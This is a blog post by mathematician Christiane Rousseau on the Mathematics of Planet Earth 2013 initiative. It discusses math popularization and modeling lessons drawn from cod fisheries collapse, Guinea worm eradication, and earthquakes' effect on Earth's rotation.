    I intend to blog regularly in 2013. I will use the blog to share with you the new developments of MPE2013. But you will also discover that one of my passions is popularization of mathematics. I am a regular contributor to the (French) magazine Accromath. This magazine is preparing a special issue on Mathematics of Planet Earth for the beginning of 2013, and we hope for a wide distribution of this special issue outside the province of Quebec. If you look at the archives of Accromath, you will see that we have highlighted all the articles that are related to MPE topics. If more magazines around the world do the same, then this will allow for significant material that teachers will be able to bring to the classroom.

    It is now three years that I have been working on MPE2013, and my main reward in this venture is that I always discover new mathematics hidden in some MPE topic, learn about the beautiful mathematics in others, and understand some of the mathematical challenges in the science of climate and sustainability. There are several important ingredients in good research: one is the significance of the question considered, and another is the power of the tools developed or used to solve it. These could be independent matters. Mathematicians are good problem solvers. They have powerful tools, and they are able to create new tools for new problems. But this is not sufficient. We need to ask the right questions, we need to use the right models. It could be very tempting to pass a line through a cloud of points, but what if the cloud of points is the beginning of an exponential phenomenon? Linear models can give a good fit with data on short intervals, but are we allowed to extrapolate over longer intervals? When we model a phenomenon, have we forgotten an essential parameter? Can we consider the model in isolation, or is the system influenced by other variables in a larger model? Let me share with you some of the new things I learned recently.

    Daniel Pauly, from the UBC Fisheries Centre, recently gave a public lecture at Centre de Recherches Mathématiques (CRM) on the state of fisheries in the world. He talked of the decline of the cod population in the Atlantic. There were two contradictory signals: the catches by small boats close to the Eastern Canadian coast were decreasing drastically, but there was no significant decrease in the deep-sea fishing catches. Which signal to follow? The choice was made to ignore the first signal, with the result that after almost 20 years there was almost no cod left in the Atlantic. We now know that there was no contradiction between the two signals: even when there are a few cods left, they stay together over a reduced areas, thus allowing for good catches.

    Last week, I learned from Robert Smith? (sic) about the successful mathematical modeling of the Guinea worm. I was five years old living in Guinea when for the first time I heard the adults explaining the risk of catching this worm, which could be a meter long and would live inside your body, usually your foot. The complicated life cycle of this worm is well known, the disease is now decreasing, and we can dream of eradicating it in the near future. Among the many parameters, the one that proved the most important is education! When one’s foot hurts, it is very tempting to put it in water. It is the moment that the worm chooses to lay 100,000 eggs. Education gives better results than chlorinating the water and the other techniques that have been tried. This example shows that we must keep an open mind when we do research on MPE topics.

    As an inhabitant of the Earth and a curious person, I am always trying to better understand our planet. A year ago, not long after the earthquake in Japan, I received the following message from John McKay: “I am asking whether there will be a session on the effect of earthquakes on the rotation speed of the Earth?” and we started exchanging messages on the matter. I remarked that a change of the rotation speed of the Earth forces many adjustments: recalibrating the telescopes, since the polar axis of the Earth might have changed position, readjusting the GPS, etc. Could this phenomenon be a good topic for a module for the MPE competition? Could it be a starting point for a modeling discussion in your course? The modeling could start with the physical situation: the closer the mass to the center of the Earth, the faster the rotation. Then, how do you orient the axis of the telescope so that only one rotation movement suffices to keep the focus on a star during a long observation period? You need not solve all the problems. Asking questions is also part of the game.

    Christiane Rousseau

    Posted in General | Leave a comment

    Hello world. This my website!

    Hello world. This my website!

    Posted in General | Leave a comment

    Hello world. This my website!

    Hello world. This my website!

    Posted in General | Leave a comment